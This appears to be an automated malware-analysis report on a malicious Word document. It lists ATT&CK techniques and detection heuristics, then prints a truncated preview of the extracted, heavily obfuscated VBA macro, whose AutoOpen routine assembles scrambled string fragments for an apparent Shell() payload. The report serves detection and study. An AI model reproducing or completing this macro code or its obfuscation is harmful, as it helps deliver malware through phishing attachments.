Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains a legacy WordBasic AutoOpen macro, which is a known indicator of malicious documents. The VBA code is heavily obfuscated and truncated, but the presence of a Shell() call suggests it attempts to execute a second-stage payload. The macro's obfuscation and the large slack space in the OLE structure are suspicious. The document is likely delivered as a spearphishing attachment.
Heuristics (6)

- VBA macros detected | severity: medium | 2 related findings | OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA | severity: critical | OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro | severity: high | OLE_VBA_AUTOOPEN: AutoOpen macro
- OLE document has large unaccounted-for region | severity: high | OLE_SLACK_ANOMALY: OLE file is 116,736 bytes but its declared streams total only 32,741 bytes; 83,995 bytes (72%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Legacy WordBasic auto-exec macro marker | severity: medium | OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL | severity: info | EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16714 bytes |

SHA-256 (macros.bas): 35ea573d1f611a4957750d3ec241a6c30b50d5666ed99999478bf42884c7d049

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "nHawNUvzilwUu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If Jwvvjn = Zjsuq Then
Dim JnTsr()
jXdET = tLUON + VGTzvB + YqoBo + oHVZYa
zJwZjs = kmbBKT + YjDJr
End If
If SMrVpY Or 12 Then
Dim EXmwnT()
LKuTDZ = lPmqUi + XSPjJ + jwEDq + zjPpF
End If
If wUuHaw >= TiCif Then
Dim dZmSf()
Cwirw = dCImvj + zjjjP
szJFi = aUYiz + jLumqN
End If
If uDwTSN <= 5 Then
Dim PCLXY()
zcNhv = XNqJPG + GKuwM
qbbOE = rLmBMn + bNWwUR
End If
If NZJqo <> AhzFiU Then
Dim PjFWPi()
IPFqc = cwWZjT + RCwJZ + QOzzzY + ZhzJT
End If
VJoaIrcvQAd (mfqmc + CHXCLI + jMsfAL + rRawNjKwWV + NajchIn + vDUfNBLRR + CzLKtSz + fRKEGd + OvCHpLr + iEtiMA + UDzRhjXO)
If fkZkjO Eqv nAqiv Then
Dim cktjLl()
mdlrzm = fvCol + qOwWm + fENfSI + wKwUB
uhuBzi = tqmswC + pGOoWu + GhZzT + soNjaB
End If
If ElkMd <= ofEjO Then
Dim jzkYwW()
VSqEs = JoJuiw + LPKkhR
XthwXj = WBjImB + njOhsj
End If
End Sub
Attribute VB_Name = "YvMwozGoSVhPO"
Function mfqmc()
If dqbUq And dcwbI Then
Dim KMBDZD()
zlzDY = BDqhXp + dROscV + jnjjS + lIohl
lMjcj = CZpImv + mOFtz + bDwqJ + QlKJs
End If
If jLRDw <= HnpqE Then
Dim GOBVOz()
wuPVFZ = EffHf + jDpzvQ + duWUT + iojpl
End If
snDsw = "`ja ,S[7,@ [p[b[q >S" + ":[Y[l[b[ [M[" + "'[U[ [Ps[E[ [G["
If jlLPL Eqv 17 Then
Dim NTEhj()
jWnzw = WIcWI + JENMGw
mSVtOw = Vksvw + aJkma + GtGVw + cOFHL
End If
If PEhwoi >= ZwRaA Then
Dim HjzjOq()
KEoVX = PBrPwt + AJhhJF + DBHfQ + OJFLd
End If
FYuiDEtXdW = "i[B[ [)[$[r[ [1[n[" + "#[ [q`[P[ [" + "y[Z[U[ [{[" + "W[G[ [Y[]@["
If TjFYJB And azUEP Then
Dim orFmkO()
SONGm = mOTiMY + jVquvR + iOpLsI + wtGbpc
End If
If BtDLc >= 11 Then
Dim zfwmQ()
XoWAUb = upmfwY + mkMOZr
End If
lJZXsjXl = " [B[Z[3[ [?[_O[ [" + "y[8%[ [R[8[" + "L[ [_Y[F[ [" + "8[ [j[ [E[m[*[ 2[gs"
mfqmc = snDsw + FYuiDEtXdW + lJZXsjXl
If dwIwLi Eqv BKuXBl Then
Dim kqtUw()
QKYap = RHAiHO + wBDzw
End If
If JMQUbJ Xor cOiDIo Then
Dim VfRhWc()
zcnim = LQWGfO + qkjib
zjPnSt = ZUGpc + WcLkdl
End If
If TMrYXt <= 9 Then
Dim okwmG()
flioVp = CqKhdA + nizFsm + iUYPuz + ljKCWl
End If
If TfQkIF < buJjkh Then
Dim CdQhO()
zzzwC = cJdSVB + EplHKB
End If
If SzmMP < HPHjRJ Then
Dim BLqSi()
EZCOdH = VNGXvj + QXvJE + kGZDL + ffsukW
End If
End Function
Function CHXCLI()
nIZOdZ = "[z`[y[f[zK[;[b[x[j[" + "v[F[e[.N[e`[y[([x[q" + "[d[H[b[^%3[W`@[ " + "[t[z&[ds[8['[([m[h" + "[m[6[f[^s@[>[b[2[fko" + "[{[4[X[_+[^[u[8" + """" + "V"
OzilScHiiVE = "[F[ACO[I[q[0[" + "A[;[>[8[2[" + "([![c[3[*[ " + "[w[B[![j[b[RX" + "[b[W[p[)[q[?[]["
wWnGB = "+[F[R[_[4[" + "*['[)[A[bS[W,[h" + "[5[:[I[lE[P" + "[vs[n[Y[Pk" + "[gS[tF[d,[7[8[n[i["
nlGSRLuvz = "4&o[/[^[A[Q" + "[([4[q[Q[Y[{[>[6[][" + "3[!6[R[\[ [N[:[/[" + ")[^[6,[V[)[f[M[a[" + "A[Gl[>[)[x[Y[!K[5V%[" + "P?[v[bI[N`[i-"
If HCval Xor 18 Then
Dim kNzVCr()
lHcMZ = DfpCzb + jdnDMm
End If
If YwjGst < 12 Then
Dim zDWbb()
JwlUqA = OzlJZ + OqphD + wjpYKo + dbIGaw
End If
If COBGrh >= iYNXjU Then
Dim ZIWSff()
TYafA = uGsKM + YMbnaM + wARKn + VwBzk
RKniq = aqKFbf + KwvSw + vFRiL + NnXiY
End If
If OZWMUJ Xor jqSZBc Then
Dim ldQjN()
ruiWr = KzXRu + Lnaih
End If
If SNUWz Eqv bwTIBm Then
Dim aTXhGS()
UBfnJ = oIhsz + hwwwEE
tpIjVF = JWifQp + EhRij + zKTRa + IEsbW
End If
WIYWEZEi = "[2[4[f[M[2[ [" + "Cc[xo[a[I[^[a[" + "^[=U[A[l[2["
If YcGYwu >= 6 Then
Dim BaBMN()
pYpNVM = fkdiU + kkJio + DzTJR + OddWrr
bFikT = oIXQo + cDXJTr
End If
If vKcWO Eqv iGikI Then
Dim lPtUFz()
PzIjjf = pfrUK + ziTRcI + uoham + vNMJC
End If
If zDXhK Or 8 Then
Dim UhkvD()
WFKHF = SOzlpv + mYHLYh + Stbph + JJjKU
End If
If BPVKo = HvkOq Then
Dim RFKKEs()
bSzvwJ = HZwJQi + NGNqP + qXuSkk + PXdsHu
tFBUX = rFhza + MiEzwU
End If
YBIcsqShi = ";[a[i[.[{[Xk[B[b
... (truncated)